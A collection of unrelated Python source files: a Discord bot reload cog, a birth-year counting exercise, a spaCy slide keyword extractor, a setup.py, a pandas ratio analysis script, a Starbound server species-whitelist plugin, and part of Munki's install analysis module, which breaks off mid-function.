        keep the ".py" suffix, which is then sliced off).
        """
        return ".".join(path.parts)[:-len(path.suffix)]

    @commands.group()
    async def reload(self, ctx):
        """Top-level reload group; shows usage when no subcommand given."""
        if ctx.invoked_subcommand is None:
            await ctx.send("Available Subcommands:\n"
                           f"{prefixes[0]}reload all - Reloads all files\n"
                           f"{prefixes[0]}reload folder <folder_name> - Reloads all cogs in the specified folder.\n"
                           f"{prefixes[0]}reload folders - Displays a list of the bot's folders.")

    @reload.command()
    @is_dev()
    async def all(self, ctx):
        """Unload then reload every cog under Bot/cogs."""
        for ext in Path().glob("Bot/cogs/*/*.py"):
            try:
                self.bot.unload_extension(self._ext_name(ext))
            except Exception:
                # Fixed message: this loop unloads, it does not load.
                print(f"Could not unload extension {ext}")
        count = 0
        for ext in Path().glob("Bot/cogs/*/*.py"):
            try:
                self.bot.load_extension(self._ext_name(ext))
                count += 1
            except Exception:
                print(f"Could not load extension {ext}")
        await ctx.send(f"Success! Files Reloaded: {count}")

    @reload.command()
    @is_dev()
    async def folders(self, ctx):
        """List the folders under Bot/cogs that contain cogs."""
        string = "Folders:\n"
        for folder in Path().glob("Bot/cogs/*"):
            try:
                # parts[2] is the folder name in "Bot/cogs/<name>".
                string += f"{folder.parts[2]}\n"
            except Exception:  # narrowed from a bare except
                print(f"{folder} was unable to be added to the string.")
                continue
        await ctx.send(string)

    @reload.command()
    @is_dev()
    async def folder(self, ctx, folder):
        """Unload then reload every cog inside Bot/cogs/<folder>."""
        for extension in Path().glob(f"Bot/cogs/{folder}/*.py"):
            try:
                self.bot.unload_extension(self._ext_name(extension))
            except Exception:  # narrowed from a bare except
                print(f"Could not unload extension {extension}")
        count = 0
        for extension in Path().glob(f"Bot/cogs/{folder}/*.py"):
            try:
                self.bot.load_extension(self._ext_name(extension))
                count += 1
            except Exception:  # narrowed from a bare except
                print(f"Could not load extension {extension}")
        await ctx.send(f"Success! Files Reloaded: {count}")
def setup(bot):
    """Entry point used by discord.py to register this cog on the bot."""
    bot.add_cog(devtools(bot))
|
"""Read the birth year of seven people and report how many have reached
the age of majority and how many have not."""
from datetime import date

adults = 0
minors = 0
for person in range(1, 8):
    birth_year = int(input('Digite o ano de nascimento da {}º pessoa: '.format(person)))
    # NOTE(review): the original exercise counts people as "de maior"
    # from age 21, not 18 -- kept as-is.
    if date.today().year - birth_year >= 21:
        adults += 1
    else:
        minors += 1
print('São {} pessoas maior de idade e {} menor de idade.'.format(adults, minors))
|
""" wordprocessing.py """
import string
from collections import OrderedDict, Counter
import sys
import re
import spacy
import numpy as np
def keyword_extractor(data: list) -> list:
    """
    Function to extract keywords from the headers and paragraphs of slides
    :param data: The list of dictionaries of the form
    :type: [{"Header":"", "Paragraph":"", slide:int}]
    :return: The list of dictionaries with keywords extracted of the form
    :rtype: [{"Header":"",
              "Paragraph":"",
              "Header_keywords": [],
              "Paragraph_keywords": [],
              slide:int}]
    """
    try:
        nlp = spacy.load("en_core_web_lg")
    except OSError as error:
        print("Please make sure you have Spacy Word Model en_core_web_lg downloaded.")
        print(error)
        sys.exit()
    # Keyword candidates: nouns (POS) or sentence subjects (dependency).
    pos_tag = ["NOUN"]
    dep_tag = ["nsubj"]
    for slide in data:
        doc_header = nlp(slide["Header"].lower())
        doc_paragraph = nlp(slide["Paragraph"].lower())
        header_keywords = []
        paragraph_keywords = []
        for token in doc_header:
            # Drop stop words and punctuation outright.
            if token.text in nlp.Defaults.stop_words or token.is_punct:
                continue
            if token.pos_ in pos_tag or token.dep_ in dep_tag:
                # NOTE(review): header keywords keep digits ([^0-9a-zA-Z])
                # while paragraph keywords strip them ([^a-zA-Z] below) --
                # confirm whether this asymmetry is intentional.
                word = re.sub(r"[^0-9a-zA-Z]+", " ", token.text)
                word = word.strip()
                # Keep only words of 3+ characters.
                if len(word) >= 3:
                    header_keywords.append(word)
        for token in doc_paragraph:
            if token.text in nlp.Defaults.stop_words or token.is_punct:
                continue
            if token.pos_ in pos_tag or token.dep_ in dep_tag:
                word = re.sub(r"[^a-zA-Z]+", " ", token.text)
                word = word.strip()
                if len(word) >= 3:
                    paragraph_keywords.append(word)
        # Results are attached to the slide dicts in place.
        slide["Header_keywords"] = header_keywords
        slide["Paragraph_keywords"] = paragraph_keywords
    return data
def duplicate_word_removal(data: list) -> list:
    """
    Removes duplicate keywords from each slide, keeping the order in which
    each keyword first appeared.
    :param data: The list of dictionaries of the form
    :type: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
    :return: The list of dictionaries with duplicate keywords removed of the form
    :rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
    """
    for entry in data:
        for field in ("Header_keywords", "Paragraph_keywords"):
            # dict preserves insertion order, so fromkeys() dedupes while
            # keeping the first occurrence of each keyword.
            entry[field] = list(dict.fromkeys(entry[field]))
    return data
def merge_slide_with_same_headers(data: list) -> list:
    """
    Function to merge slides with the same header.
    :param data: The list of dictionaries of the form
    :type: [{"Header":"",
             "Paragraph":"",
             "Header_keywords": [],
             "Paragraph_keywords": [],
             slide:int}]
    :return: The list of dictionaries where slides containing the same header are merged
    :rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
    """
    merged = []
    seen_headers = []
    for slide in data:
        header = slide["Header"]
        if header in seen_headers:
            # Already merged when the first slide with this header was seen.
            continue
        seen_headers.append(header)
        matching = [other for other in data if other["Header"] == header]
        # Paragraph keywords are concatenated across all matching slides;
        # header keywords come from the first matching slide only.
        combined_keywords = []
        for match in matching:
            combined_keywords.extend(match["Paragraph_keywords"])
        merged.append({
            "Header": header,
            "Header_keywords": slide["Header_keywords"],
            "Paragraph_keywords": combined_keywords,
            "slides": [match["slide"] for match in matching],
        })
    return merged
def merge_slide_with_same_slide_number(data: list) -> list:
    """
    Function to merge slides with the same slide number into a single one.
    :param data: The list of dictionaries of the form
    :type: [{"Header":"",
             "Paragraph":"",
             "Header_keywords": [],
             "Paragraph_keywords": [],
             slide:int}]
    :return: The list of dictionaries where slides containing the same slide number are merged
    :rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slide:int}]
    """
    merged = []
    seen_numbers = set()
    for slide in data:
        number = slide["slide"]
        if number in seen_numbers:
            continue
        seen_numbers.add(number)
        matching = [other for other in data if other["slide"] == number]
        # Both keyword lists are concatenated across all entries sharing
        # the slide number; the header comes from the first entry.
        merged.append({
            "Header": slide["Header"],
            "Header_keywords": [kw for m in matching
                                for kw in m["Header_keywords"]],
            "Paragraph_keywords": [kw for m in matching
                                   for kw in m["Paragraph_keywords"]],
            "slide": number,
        })
    return merged
def construct_search_query(data: list) -> list:
    """
    Constructs a search query given a PDF data.

    Each keyword is weighted by the number of slides its entry covers;
    only keywords whose weighted frequency is strictly above the mean
    frequency are kept (header keywords first, then paragraph keywords).

    :param data: The list of data (merged entries with "Header_keywords",
        "Paragraph_keywords" and "slides")
    :type: list
    :return: List of words to search
    :rtype: list
    """
    header_keywords = []
    paragraph_keywords = []
    for item in data:
        # Repeat each keyword once per covered slide so that keywords from
        # frequently occurring entries weigh more.
        header_keywords += item["Header_keywords"] * len(item["slides"])
        paragraph_keywords += item["Paragraph_keywords"] * len(item["slides"])

    def _above_mean(counts):
        """Return keys whose count is strictly greater than the mean."""
        if not counts:
            # Guard: np.mean of an empty array is nan (and warns).
            return []
        mean = np.array(list(counts.values())).mean()
        return [key for key, value in counts.items() if value > mean]

    return (_above_mean(Counter(header_keywords)) +
            _above_mean(Counter(paragraph_keywords)))
def extract_noun_chunks(data: list) -> list:
    """
    Extracts nouns using Spacy
    :param data: list of PDF data
    :type: list
    :return: list of data with nouns extracted
    :rtype: list
    """
    try:
        nlp = spacy.load("en_core_web_lg")
    except OSError as error:
        print("Please make sure you have Spacy Word Model en_core_web_lg downloaded.")
        print(error)
        sys.exit()
    for slide in data:
        # noun_chunks yields the base noun phrases of each document.
        doc_header_noun_chunks = nlp(slide["Header"].lower()).noun_chunks
        doc_paragraph_noun_chunks = nlp(slide["Paragraph"].lower()).noun_chunks
        header_keywords = []
        paragraph_keywords = []
        for token in doc_header_noun_chunks:
            processed_words = []
            words = token.text.split()
            for word in words:
                # Letters only, then drop stop words / bare punctuation.
                word = re.sub(r"[^a-zA-Z]+", "", word).strip()
                if word in nlp.Defaults.stop_words or word in string.punctuation:
                    continue
                if len(word) >= 3:
                    processed_words.append(word)
            # Only multi-word phrases are kept as keywords.
            if len(processed_words) >= 2:
                header_keywords.append(" ".join(processed_words))
        for token in doc_paragraph_noun_chunks:
            processed_words = []
            words = token.text.split()
            for word in words:
                word = re.sub(r"[^a-zA-Z]+", "", word).strip()
                if word in nlp.Defaults.stop_words or word in string.punctuation:
                    continue
                if len(word) >= 3:
                    processed_words.append(word)
            if len(processed_words) >= 2:
                paragraph_keywords.append(" ".join(processed_words))
        # Results are attached to the slide dicts in place.
        slide["Header_keywords"] = header_keywords
        slide["Paragraph_keywords"] = paragraph_keywords
    return data
if __name__ == "__main__":
    # Smoke test: run the full keyword pipeline over three sample slides
    # and print the intermediate result after each stage.
    main_data = [{"Header": "Dimensionality Reduction PCA",
                  "Paragraph": "Dimensionality Reduction Purposes: – Avoid curse of dimensionality \
– Reduce amount of time and memory required by data mining algorithms Allow data to be more easily \
visualized May help to eliminate irrelevant features or reduce noise Techniques Principal Component Analysis \
Singular Value Decomposition supervised and non-linear techniques",
                  "slide": 8},
                 {"Header": "Gratuitous ARP",
                  "Paragraph": "Every machine broadcasts its mapping when it boots to"
                               " update ARP caches in other "
                               "machines \n "
                               "Example: A sends an ARP Request with its own IP"
                               " address as the target IP address \n "
                               "Sender MAC=MACA, Sender IP=IPA n Target MAC=??, Target IP=IPA \n "
                               "What if a reply is received?",
                  "slide": 9},
                 {"Header": "Dimensionality Reduction PCA",
                  "Paragraph": "Goal is to find a projection that captures"
                               "the largest amount of variation in data \
Find the eigenvectors of the covariance matrix The eigenvectors define the new space",
                  "slide": 9}]
    keyword_data = keyword_extractor(main_data)
    print(keyword_data)
    keyword_data = merge_slide_with_same_slide_number(keyword_data)
    print(keyword_data)
    keyword_data = merge_slide_with_same_headers(keyword_data)
    print(keyword_data)
    keyword_data = duplicate_word_removal(keyword_data)
    print(keyword_data)
|
from setuptools import setup
# Package metadata; the distribution name matches the URL and package dir.
setup(name='ascii_engine',  # bug fix: was misspelled 'ascii_enine'
      version='0.0.1',
      description='Create ASCII-based programs',
      url='http://github.com/carlosmaniero/ascii-engine',
      author='Carlos Maniero',
      author_email='carlosmaniero@gmail.com',
      license='MIT',
      packages=['ascii_engine'],
      install_requires=[],
      zip_safe=False)
|
"""
Big data processing (enhanced version).
Author: lj1218
Date : 2018-12-09
===========================================
条件:
1、x,y 从B列取值;z从A列取值;
2、z > y > x.
求解:
1、精确到小数点后2位,求 (z-y)/(y-x);
2、出现频率最高的比值,列出所对应的x,y,z组合.
===========================================
"""
import os
import sys
import time
from functools import partial, wraps
import numpy as np
import pandas as pd
from tool import Timer
def get_time():
    """Return the current local time formatted as ``YYYY-MM-DD HH:MM:SS``."""
    # strftime() formats the current local time when no struct_time is given.
    return time.strftime("%Y-%m-%d %H:%M:%S")
def print_msg(msg):
    """Print *msg* prefixed with a timestamp and flush stdout immediately."""
    # flush=True replaces the explicit sys.stdout.flush() call.
    print('[{}] {}'.format(get_time(), msg), flush=True)
def get_lines_number(filename):
    """Get number of lines in text file."""
    with open(filename) as handle:
        # Stream the file once; sum() over a generator avoids holding
        # the whole file in memory.
        return sum(1 for _ in handle)
def gen_org_data(out_file, out_index='x,y,z',
                 xlsx_file='data.xlsx', print_n=10000):
    """Generate original data for calculation.

    Reads column 'z' and column 'y,x' from Sheet1 of *xlsx_file* and
    writes every (x, y, z) combination with x < y < z to *out_file* as
    CSV (header line given by *out_index*).

    :param print_n: progress-print interval, forwarded to the writer
    """
    xlsx = pd.ExcelFile(xlsx_file)
    df = pd.read_excel(xlsx, 'Sheet1')
    # Sorting ascending lets __gen_org_data stop its inner loops early.
    z_set = df['z'].dropna().sort_values()
    x_y_set = df['y,x'].dropna().sort_values()
    print_msg('start generating original data...')
    timer = Timer()
    with open(out_file, 'w', encoding='utf-8') as f:
        __gen_org_data(z_set, x_y_set, f, out_index, print_n)
    print_msg('finish generating original data ({}s)'.format(timer.elapse(2)))
def __gen_org_data(z_set, x_y_set, fh, out_index, print_n):
    # Write every (x, y, z) combination with x < y < z to *fh* as CSV.
    # Relies on z_set and x_y_set being sorted ascending (the caller sorts
    # them), so the inner loops can break at the first too-large value.
    fh.write(out_index + '\n')
    count = 0
    for z in z_set:
        for y in x_y_set:
            if y >= z:
                break
            for x in x_y_set:
                if x >= y:
                    break
                count += 1
                fh.write('{},{},{}\n'.format(x, y, int(z)))
                if count % print_n == 0:
                    print_msg('count={}'.format(count))
    print_msg('count={}'.format(count))
    # Upper bound without the x < y < z constraint; the actual number of
    # rows written is the count printed above.
    print_msg('total={}'.format(len(x_y_set) * len(x_y_set) * len(z_set)))
def profiled(func=None, *, total=None, print_n=10, name='n'):
    """Decorate function call times and print some message.

    Counts calls to the wrapped function and prints a progress message
    every *print_n* calls (as a fraction when *total* is given).  The
    wrapper exposes ``wrapper.n_calls()`` returning the call count.

    :param func: decorated function (None when used with keyword options)
    :param total: expected total number of calls, used for the fraction
    :param print_n: print every *print_n* calls
    :param name: label used in the progress message
    """
    if func is None:
        # Support both @profiled and @profiled(total=..., ...) usage.
        return partial(profiled, total=total, print_n=print_n, name=name)
    n_calls = 0

    @wraps(func)
    def wrapper(*args, **kwargs):
        nonlocal n_calls
        n_calls += 1
        if n_calls % print_n == 0:
            if total is None:
                print_msg('{}={}'.format(name, n_calls))
            else:
                print_msg('{}={} ({})'.format(
                    name, n_calls, round(n_calls/total, 3))
                )
        # Bug fix: forward keyword arguments with **kwargs; the original
        # ``*kwargs`` unpacked only the dict's KEYS as positional args.
        return func(*args, **kwargs)

    wrapper.n_calls = lambda: n_calls
    return wrapper
def do_calc(filename, result_col='ratio', ndigits=2, print_n=100000):
    """Do calculation.

    Streams *filename* (CSV with columns x,y,z), computes
    ``round((z - y) / (y - x), ndigits)`` for every row, then loads the
    CSV into a DataFrame and appends the ratios as column *result_col*.

    :return: DataFrame with the original columns plus *result_col*
    """
    def get_row_number():
        print_msg('start counting data rows...')
        # Minus one for the header line.
        rows = get_lines_number(filename) - 1
        print_msg('finish counting data rows ({}s)'.format(timer.elapse(2)))
        return rows

    timer = Timer()
    row_number = get_row_number()
    print_msg('total rows = {}'.format(row_number))

    @profiled(total=row_number, print_n=print_n, name='calc_counter')
    def calc(s):
        x = s['x']
        y = s['y']
        z = s['z']
        return round((z - y) / (y - x), ndigits)

    print_msg('start calculation...')
    timer.reset()
    ratios = []
    with open(filename) as f:
        for line in f:
            line = line.split(',')
            try:
                data = {
                    'x': np.float64(line[0]),
                    'y': np.float64(line[1]),
                    'z': np.float64(line[2]),
                }
            except ValueError:
                # Header line (or any malformed row) is skipped.
                continue
            ratios.append(calc(data))
    print_msg('finish calculation ({}s)'.format(timer.elapse(2)))

    print_msg('start loading org data...')
    timer.reset()
    df = pd.read_csv(filename)
    print_msg('finish loading org data ({}s)'.format(timer.elapse(2)))
    print_msg('start appending result column...')
    timer.reset()
    # read_csv keeps file order, so the ratio list lines up positionally
    # with the DataFrame rows.
    df[result_col] = ratios
    print_msg('finish appending result column ({}s)'.format(timer.elapse(2)))
    return df
def find_max_occur(groups, print_n=10000):
    """Find max occurred results from groups.

    :param groups: iterable of (key, sub-frame) pairs (a pandas GroupBy)
    :return: list of all (key, sub-frame) pairs sharing the largest size
    """
    @profiled(total=len(groups), print_n=print_n, name='find_max_counter')
    def _find_max_occur(grp, max_occur, rs):
        # grp is a (key, sub-frame) pair; groups are compared by length.
        number = len(grp[1])
        if number > max_occur:
            # New maximum: restart the result list with this group.
            rs = [grp]
            max_occur = number
        elif number == max_occur:
            rs.append(grp)
        return rs, max_occur

    max_ = 0
    result = []
    print_msg('start finding max occur...')
    print_msg('total groups = {}'.format(len(groups)))
    timer = Timer()
    for group in groups:
        result, max_ = _find_max_occur(group, max_, result)
    print_msg('finish finding max occur ({}s)'.format(timer.elapse(2)))
    return result
def save_result(rs, out_dir, print_n=10):
    """Save result.

    Writes each (ratio, sub-frame) pair to ``result_<ratio>.csv`` inside
    *out_dir*.
    """
    @profiled(total=len(rs), print_n=print_n, name='save_rs_counter')
    def _save_result(r, directory):
        filename = os.path.join(directory, 'result_{}.csv'.format(r[0]))
        df = r[1]
        # The ratio is already encoded in the file name; drop the column.
        # NOTE(review): this mutates the grouped sub-frame in place.
        del df['ratio']
        df.to_csv(filename, index=False)

    print_msg('start saving result...')
    print_msg('total results = {}'.format(len(rs)))
    timer = Timer()
    for x in rs:
        _save_result(x, out_dir)
    print_msg('finish saving result ({}s)'.format(timer.elapse(2)))
def main():
    """Run the pipeline: generate, calculate, sort, group, save."""
    # Directory / file layout.
    source_dir = 'data'
    output_dir = 'result'
    max_occur_dir = os.path.join(output_dir, 'max_occur')
    xlsx_path = os.path.join(source_dir, 'data.xlsx')
    org_csv_path = os.path.join(source_dir, 'org_data.csv')
    sorted_csv_path = os.path.join(output_dir, 'data_sorted.csv')
    keep_sorted_csv = False  # flip on to persist the intermediate sort
    print_msg('start running...')
    total_timer = Timer()
    # Build the source CSV from the spreadsheet only when it is missing.
    if not os.path.exists(org_csv_path):
        gen_org_data(out_file=org_csv_path,
                     xlsx_file=xlsx_path, print_n=100000)
    frame = do_calc(org_csv_path, ndigits=2, print_n=100000)
    print_msg('start sorting values...')
    step_timer = Timer()
    frame_sorted = frame.sort_values(by='ratio')
    print_msg('finish sorting values ({}s)'.format(step_timer.elapse(2)))
    if keep_sorted_csv:
        print_msg('start saving sorted data to file...')
        step_timer.reset()
        frame_sorted.to_csv(sorted_csv_path, index=False)
        print_msg('finish saving sorted data to file ({}s)'.format(
            step_timer.elapse(2)))
    print_msg('start grouping data...')
    step_timer.reset()
    grouped = frame_sorted.groupby('ratio')
    print_msg('finish grouping data ({}s)'.format(step_timer.elapse(2)))
    result = find_max_occur(grouped, print_n=10000)
    save_result(result, max_occur_dir, print_n=10)
    print_msg('finish running ({}s)'.format(total_timer.elapse(2)))
# Run the pipeline only when executed as a script (not on import).
if __name__ == '__main__':
    main()
|
"""
StarryPy species whitelist plugin
Prevents players with unknown species from joining the server.
This is necessary due to a year+ old "bug" detailed here:
https://community.playstarbound.com/threads/119569/
Original Authors: GermaniumSystem
"""
from base_plugin import BasePlugin
from data_parser import ConnectFailure
from packets import packets
from pparser import build_packet
class SpeciesWhitelist(BasePlugin):
    """Reject connecting players whose species is not on the whitelist.

    Works around a long-standing Starbound issue where characters with
    unknown (modded) species can break the server; see the module
    docstring for the upstream report.
    """
    name = "species_whitelist"
    depends = ["player_manager"]
    default_config = {"enabled": False,
                      "allowed_species": [
                          "apex",
                          "avian",
                          "glitch",
                          "floran",
                          "human",
                          "hylotl",
                          "penguin",
                          "novakid"
                      ]}

    def activate(self):
        """Cache plugin settings once at activation time."""
        super().activate()
        # Fetch the plugin config a single time; both settings come from
        # the same dict, so there is no need for two lookups.
        config = self.config.get_plugin_config(self.name)
        self.enabled = config["enabled"]
        self.allowed_species = config["allowed_species"]

    def on_client_connect(self, data, connection):
        """Packet hook: allow or reject a connecting client by species.

        Returns True to let the connection proceed; returns False after
        sending a connect_failure packet and dropping the connection.
        """
        if not self.enabled:
            return True
        species = data['parsed']['species']
        if species not in self.allowed_species:
            # Logger.warn() is a deprecated alias; use warning().
            self.logger.warning("Aborting connection - player's species ({}) "
                                "is not in whitelist.".format(species))
            rejection_packet = build_packet(
                packets['connect_failure'],
                ConnectFailure.build(dict(reason="^red;Connection "
                    "aborted!\n\n^orange;Your species ({}) is not "
                    "allowed on this server.\n^green;Please use a "
                    "different character.".format(species))))
            yield from connection.raw_write(rejection_packet)
            connection.die()
            return False
        return True
|
# encoding: utf-8
#
# Copyright 2009-2017 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
updatecheck.analyze
Created by Greg Neagle on 2017-01-10.
"""
import datetime
import os
from . import catalogs
from . import compare
from . import download
from . import installationstate
from . import manifestutils
from . import unused_software
from .. import display
from .. import fetch
from .. import info
from .. import installer
from .. import munkilog
from .. import processes
def item_in_installinfo(item_pl, thelist, vers=''):
    """Determines if an item is in a list of processed items.

    Returns True if the item has already been processed (it's in the list)
    and, optionally, the version is the same or greater.
    """
    for entry in thelist:
        try:
            # Guard clause: only entries with a matching name matter.
            if entry['name'] != item_pl['name']:
                continue
            if not vers:
                return True
            # compare_versions returns 1 (same) or 2 (greater) when the
            # first argument satisfies the requested version.
            if entry.get('installed') and compare.compare_versions(
                    entry.get('installed_version'), vers) in (1, 2):
                return True
            if compare.compare_versions(
                    entry.get('version_to_install'), vers) in (1, 2):
                return True
        except KeyError:
            # entry (or item_pl) is missing 'name', so it can't match
            continue
    return False
def is_apple_item(item_pl):
    """Returns True if the item to be installed or removed appears to be from
    Apple. If we are installing or removing any Apple items in a check/install
    cycle, we skip checking/installing Apple updates from an Apple Software
    Update server so we don't stomp on each other"""
    # A 'com.apple.' prefix on any receipt package id or any installs
    # bundle identifier marks the item as Apple-supplied.
    if any(receipt.get('packageid', '').startswith('com.apple.')
           for receipt in item_pl.get('receipts', [])):
        return True
    return any(install.get('CFBundleIdentifier', '').startswith('com.apple.')
               for install in item_pl.get('installs', []))
def process_managed_update(manifestitem, cataloglist, installinfo):
    """Queue an update for manifestitem if some version is installed.

    Items already handled for update, install or uninstall in this run
    are skipped, as are items with no pkginfo in the given catalogs.
    """
    item_name = os.path.split(manifestitem)[1]
    display.display_debug1(
        '* Processing manifest item %s for update', item_name)
    # Skip anything this run has already dealt with in any capacity.
    if item_name in installinfo['managed_updates']:
        display.display_debug1(
            '%s has already been processed for update.', item_name)
        return
    if item_name in installinfo['processed_installs']:
        display.display_debug1(
            '%s has already been processed for install.', item_name)
        return
    if item_name in installinfo['processed_uninstalls']:
        display.display_debug1(
            '%s has already been processed for uninstall.', item_name)
        return
    item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
    if not item_pl:
        display.display_warning(
            'Could not process item %s for update. No pkginfo found in '
            'catalogs: %s ', manifestitem, ', '.join(cataloglist))
        return
    if not installationstate.some_version_installed(item_pl):
        display.display_debug1(
            '%s does not appear to be installed, so no managed updates...',
            item_name)
        return
    # Managed updates only apply to software that is already present;
    # record it and let process_install work out the details.
    installinfo['managed_updates'].append(item_name)
    dummy_result = process_install(
        manifestitem, cataloglist, installinfo, is_managed_update=True)
def process_optional_install(manifestitem, cataloglist, installinfo):
    """Process an optional install item to see if it should be added to
    the list of optional installs.

    Appends an iteminfo dict describing the item and its install state to
    installinfo['optional_installs'], unless the item has already been
    handled this run or no pkginfo can be found in the catalogs.
    """
    manifestitemname = os.path.split(manifestitem)[1]
    # Pass the name as a lazy argument, consistent with every other
    # display call in this module (was eager %-interpolation).
    display.display_debug1(
        "* Processing manifest item %s for optional install", manifestitemname)
    # have we already processed this?
    # NOTE(review): optional_installs holds iteminfo dicts, so testing a
    # bare name against it never matches; the loop over item['name'] below
    # performs the real duplicate check. Confirm before removing.
    if manifestitemname in installinfo['optional_installs']:
        display.display_debug1(
            '%s has already been processed for optional install.',
            manifestitemname)
        return
    elif manifestitemname in installinfo['processed_installs']:
        display.display_debug1(
            '%s has already been processed for install.', manifestitemname)
        return
    elif manifestitemname in installinfo['processed_uninstalls']:
        display.display_debug1(
            '%s has already been processed for uninstall.', manifestitemname)
        return
    # check to see if item (any version) is already in the
    # optional_install list:
    for item in installinfo['optional_installs']:
        if manifestitemname == item['name']:
            display.display_debug1(
                '%s has already been processed for optional install.',
                manifestitemname)
            return
    item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
    if not item_pl:
        display.display_warning(
            'Could not process item %s for optional install. No pkginfo found '
            'in catalogs: %s ', manifestitem, ', '.join(cataloglist))
        return
    # A formerly-used optional install that is now unused gets removed.
    is_currently_installed = installationstate.some_version_installed(item_pl)
    if is_currently_installed and unused_software.should_be_removed(item_pl):
        process_removal(manifestitem, cataloglist, installinfo)
        installer.remove_from_selfserve_installs(manifestitem)
        return
    # if we get to this point we can add this item
    # to the list of optional installs
    iteminfo = {}
    iteminfo['name'] = item_pl.get('name', manifestitemname)
    iteminfo['description'] = item_pl.get('description', '')
    iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
    iteminfo['display_name'] = item_pl.get('display_name', '')
    for key in ['category', 'developer', 'featured', 'icon_name', 'icon_hash',
                'requires', 'RestartAction']:
        if key in item_pl:
            iteminfo[key] = item_pl[key]
    iteminfo['installed'] = is_currently_installed
    if iteminfo['installed']:
        iteminfo['needs_update'] = (
            installationstate.installed_state(item_pl) == 0)
    iteminfo['licensed_seat_info_available'] = item_pl.get(
        'licensed_seat_info_available', False)
    iteminfo['uninstallable'] = (
        item_pl.get('uninstallable', False)
        and (item_pl.get('uninstall_method', '') != ''))
    # sizes are in KBytes
    iteminfo['installer_item_size'] = \
        item_pl.get('installer_item_size', 0)
    # Read the 'installed_size' key, falling back to the installer item
    # size — consistent with process_install; previously this re-read
    # 'installer_item_size', making the fallback dead.
    iteminfo['installed_size'] = item_pl.get(
        'installed_size', iteminfo['installer_item_size'])
    if (not iteminfo['installed']) or (iteminfo.get('needs_update')):
        if not download.enough_disk_space(
                item_pl, installinfo.get('managed_installs', []), warn=False):
            iteminfo['note'] = (
                'Insufficient disk space to download and install.')
    optional_keys = ['preinstall_alert',
                     'preuninstall_alert',
                     'preupgrade_alert',
                     'OnDemand']
    for key in optional_keys:
        if key in item_pl:
            iteminfo[key] = item_pl[key]
    display.display_debug1(
        'Adding %s to the optional install list', iteminfo['name'])
    installinfo['optional_installs'].append(iteminfo)
def process_install(manifestitem, cataloglist, installinfo,
                    is_managed_update=False):
    """Processes a manifest item for install. Determines if it needs to be
    installed, and if so, if any items it is dependent on need to
    be installed first. Installation detail is added to
    installinfo['managed_installs']
    Calls itself recursively as it processes dependencies.
    Returns a boolean; when processing dependencies, a false return
    will stop the installation of a dependent item

    Args:
        manifestitem: item name, optionally with a --version suffix.
        cataloglist: catalog names to search for pkginfo.
        installinfo: accumulator dict; this function reads/appends the
            'processed_installs', 'processed_uninstalls' and
            'managed_installs' lists.
        is_managed_update: when True the item is being processed on
            behalf of process_managed_update and is NOT recorded in
            'processed_installs'.
    """
    manifestitemname = os.path.split(manifestitem)[1]
    display.display_debug1(
        '* Processing manifest item %s for install', manifestitemname)
    (manifestitemname_withoutversion, includedversion) = (
        catalogs.split_name_and_version(manifestitemname))
    # have we processed this already (or explicitly uninstalled it)?
    if manifestitemname in installinfo['processed_installs']:
        display.display_debug1(
            '%s has already been processed for install.', manifestitemname)
        return True
    elif (manifestitemname_withoutversion in
          installinfo['processed_uninstalls']):
        display.display_warning(
            'Will not process %s for install because it has already '
            'been processed for uninstall!', manifestitemname)
        return False
    item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
    if not item_pl:
        display.display_warning(
            'Could not process item %s for install. No pkginfo found in '
            'catalogs: %s ', manifestitem, ', '.join(cataloglist))
        return False
    elif is_managed_update:
        # we're processing this as a managed update, so don't
        # add it to the processed_installs list
        pass
    else:
        # we found it, so add it to our list of processed installs
        # so we don't process it again in the future
        display.display_debug2(
            'Adding %s to list of processed installs' % manifestitemname)
        installinfo['processed_installs'].append(manifestitemname)
    if item_in_installinfo(item_pl, installinfo['managed_installs'],
                           vers=item_pl.get('version')):
        # has this item already been added to the list of things to install?
        display.display_debug1(
            '%s is or will be installed.', manifestitemname)
        return True
    # check dependencies
    dependencies_met = True
    # there are two kinds of dependencies/relationships.
    #
    # 'requires' are prerequistes:
    #  package A requires package B be installed first.
    #  if package A is removed, package B is unaffected.
    #  requires can be a one to many relationship.
    #
    #  The second type of relationship is 'update_for'.
    #  This signifies that that current package should be considered an update
    #  for the packages listed in the 'update_for' array. When processing a
    #  package, we look through the catalogs for other packages that declare
    #  they are updates for the current package and install them if needed.
    #  This can be a one-to-many relationship - one package can be an update
    #  for several other packages; for example, 'PhotoshopCS4update-11.0.1'
    #  could be an update for PhotoshopCS4 and for AdobeCS4DesignSuite.
    #
    #  When removing an item, any updates for that item are removed as well.
    if 'requires' in item_pl:
        dependencies = item_pl['requires']
        # fix things if 'requires' was specified as a string
        # instead of an array of strings
        if isinstance(dependencies, basestring):
            dependencies = [dependencies]
        for item in dependencies:
            display.display_detail(
                '%s-%s requires %s. Getting info on %s...'
                % (item_pl.get('name', manifestitemname),
                   item_pl.get('version', ''), item, item))
            # recurse; a failed dependency blocks this install
            success = process_install(item, cataloglist, installinfo,
                                      is_managed_update=is_managed_update)
            if not success:
                dependencies_met = False
    iteminfo = {}
    iteminfo['name'] = item_pl.get('name', '')
    iteminfo['display_name'] = item_pl.get('display_name', iteminfo['name'])
    iteminfo['description'] = item_pl.get('description', '')
    if not dependencies_met:
        display.display_warning(
            'Didn\'t attempt to install %s because could not resolve all '
            'dependencies.', manifestitemname)
        # add information to managed_installs so we have some feedback
        # to display in MSC.app
        iteminfo['installed'] = False
        iteminfo['note'] = ('Can\'t install %s because could not resolve all '
                            'dependencies.' % iteminfo['display_name'])
        iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
        installinfo['managed_installs'].append(iteminfo)
        return False
    installed_state = installationstate.installed_state(item_pl)
    if installed_state == 0:
